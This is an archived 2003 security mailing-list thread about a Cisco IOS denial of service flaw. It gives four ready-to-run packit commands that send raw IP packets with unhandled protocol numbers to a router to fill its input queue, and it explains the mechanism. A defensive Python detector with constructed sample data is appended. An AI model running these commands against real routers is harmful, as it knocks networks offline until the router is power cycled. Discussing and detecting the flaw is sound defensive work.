Hello Curt,

You can download the latest packit from http://packit.sourceforge.net.

Install and execute one of the following commands to exploit the vulnerability:

packit -t RAWIP -V 53 -d dst_ip -T ttl_val -c 76 -b 76
packit -t RAWIP -V 55 -d dst_ip -T ttl_val -c 76 -b 76
packit -t RAWIP -V 77 -d dst_ip -T ttl_val -c 76 -b 76
packit -t RAWIP -V 103 -d dst_ip -T ttl_val -c 76 -b 76

Thanks,

Darren Bounds

On Sun, 2003-07-20 at 14:58, Curt Purdy wrote:
> Could we have an example of an hping command to invoke this. I have been
> playing with it and would like a real-world example, and since there are now
> multiple exploits out, this knowledge should not be a problem. Thanks.
>
> Curt
>
> ----------------------------------------
>
> Practice safe hex.
>
> - Andrew Briney, editor Information Security
>
>
> -----Original Message-----
> From: Richard Johnson [mailto:rdumpat_private]
> Sent: Sunday, July 20, 2003 2:21 AM
> To: incidentsat_private
> Subject: Re: Cisco IOS Denial of Service that affects most Cisco IOS
> routers- requires power cycle to recover
>
>
> In article
> <Pine.BSO.4.53.0307172223150.11409at_private-guesswork.com>,
> Tina Bird <tbird@precision-guesswork.com> wrote:
>
> > information on the detailed structure of the evil packets in these
> > protocols is not yet public AFAIK.
>
>
> The router has problems if it receives a packet, content irrelevant,
> that makes it to supervisor level claiming an IP protocol that it
> doesn't have code to handle.
>
> The kickup to supervisor level happens when the packet is targeted
> directly at the router's IP address (per first Cisco advisory) or just
> has its TTL expire in transit past the router (per revised Cisco
> advisory).
>
> Send enough packets (default 75), and the input queue is full. hping is
> enough of a launch platform for that--there's no need for
> questionable-source exploit binaries when testing.
>
>
> Richard
>
> --
> My mailbox. My property. My personal space. My rules. Deal with it.
> http://www.river.com/users/share/cluetrain/

--
Darren Bounds
Security Consultant
Information Security Services
Intrusense Inc.

--
Intrusense - Securing Business As Usual
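For defenders, the conditions described in the thread (IP protocol 53, 55, 77 or 103, addressed to the router or with a TTL that expires at it, in numbers reaching the default queue size of 75) can be checked against captured IPv4 headers. The following is an added example, not part of the original messages; the function names, the router address and the sample headers are constructed for illustration, and it assumes the capture point sits one hop upstream of the router.

```python
import struct
from collections import Counter

SUSPECT_PROTOCOLS = {53, 55, 77, 103}  # protocol numbers used in the thread
QUEUE_DEPTH = 75                       # default input queue size cited in the thread

def parse_ipv4(raw):
    """Return (ttl, proto, dst) from a raw IPv4 header, or None if malformed."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl:
        return None
    return raw[8], raw[9], ".".join(str(b) for b in raw[16:20])

def reaches_router_cpu(ttl, dst, router_ips):
    # Assumption: sensor is one hop upstream, so TTL <= 1 expires at the router.
    return dst in router_ips or ttl <= 1

def scan(headers, router_ips):
    """Count suspect-protocol packets that the router would process itself."""
    hits, malformed = Counter(), 0
    for raw in headers:
        parsed = parse_ipv4(raw)
        if parsed is None:
            malformed += 1
            continue
        ttl, proto, dst = parsed
        if proto in SUSPECT_PROTOCOLS and reaches_router_cpu(ttl, dst, router_ips):
            hits[proto] += 1
    total = sum(hits.values())
    return {"per_protocol": dict(hits), "total": total,
            "malformed": malformed, "queue_at_risk": total >= QUEUE_DEPTH}

def make_header(proto, ttl, dst, src="198.51.100.7"):
    """Constructed 20-byte IPv4 header (checksum zero) for the sample data only."""
    to_bytes = lambda ip: bytes(int(p) for p in ip.split("."))
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, ttl, proto, 0,
                       to_bytes(src), to_bytes(dst))

ROUTER_IPS = {"192.0.2.1"}  # hypothetical router address (documentation range)
SAMPLE = ([make_header(53, 64, "192.0.2.1")] * 76      # addressed to the router
          + [make_header(77, 1, "203.0.113.9")]        # transit, TTL expiring
          + [make_header(103, 64, "203.0.113.9")]      # transit, TTL healthy
          + [make_header(6, 64, "192.0.2.1")] * 3      # ordinary TCP to the router
          + [b"\x45\x00"])                             # truncated capture

if __name__ == "__main__":
    print(scan(SAMPLE, ROUTER_IPS))
```

The transit packet with a healthy TTL and the ordinary TCP traffic are not counted, which matches the thread's point that only packets the router itself has to process contribute to the full queue.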
This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 13:44:59 PDT